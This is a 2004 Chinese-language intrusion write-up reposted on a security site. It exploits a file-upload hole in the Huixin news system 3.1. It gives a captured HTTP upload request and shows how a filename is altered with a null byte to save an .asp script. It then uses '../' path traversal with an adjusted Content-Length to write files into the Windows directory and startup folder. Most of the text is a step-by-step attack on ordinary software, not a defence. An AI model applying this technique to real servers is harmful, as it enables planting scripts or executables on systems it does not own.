首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
文件上传漏洞在惠信中的应用
来源:xfocus.net 作者:haixiao 发布时间:2004-05-31  

近来大家为dvbbs的文件上传漏洞兴奋不已,想想在其他的系统里面能不能用的上呢?我就以惠信新闻系统来抛砖引玉吧!
惠信新闻系统3.1 windows2000+sp4
先看这句代码。admin_uploadfilesave.asp
...............
Server.mappath(formPath&file.FileName)
............................
保存时用路径+文件名+后缀名,那我们可以用dvbbs上的漏洞了,只不过我们改的是文件名(因为系统有固定的路径 ,改路径的话,上传不会成功)
这是我捕获的数据:
POST /admin_uploadfilesave.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Referer: http://127.0.0.1/admin_uploadfile.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d42cb1f101ae
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 127.0.0.1
Content-Length: 658
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACQQRQ=GKCHPMAACAKICGCMGMMBCLAL

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="act"

upload
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="upcount"

1
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="filepath"

newstxt/
-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="file1"; filename="G:\www.asp .jpg"
Content-Type: text/plain

<% language=vbscript %>
<ihihoiojpojppokkhhkhkhkhk
hkhjkjkjjlkkkkkk>

-----------------------------7d42cb1f101ae
Content-Disposition: form-data; name="Submit"

提交
-----------------------------7d42cb1f101ae--
我将其中filename 处改为www.asp+(空格).jpg,同dvbbs利用一样改content_length的长度,然后用编辑器修改空格十六进制20为00,上传成功!呵呵!

再看路径我们不能改,那能不能利用../../这样的方式回切呢?试试就知道了,捕获数据同上,将name="filepath"
newstxt/ 改为: newstxt/../../../winnt
content-length:658 改为:(658+14)672
好,开始上传,哈哈!在winnt下发现www.asp文件。那我们就可以将路径改为windows的自启动目录,上传exe,vbs,bat...文件。不过以上都要在获得新闻系统的管理者之后,进一步进入。



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·巧用asp木马和KV2004得到管理员
·or1=1等漏洞问题
·Chinaren脚本注入式攻击(1)
·动网和动力文章系统打印页面SQL
·对某PHP站点的一次渗透
·克隆/删除任意用户(RingZ_CDUse
·入侵灰色轨迹论坛
·DVBBS7.0 --幕后的微笑
·ARP欺骗技术
·Backup a shell
·桂林老兵的SQLSERVER高级注入技
·如何利用Sql 注入遍历目录
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved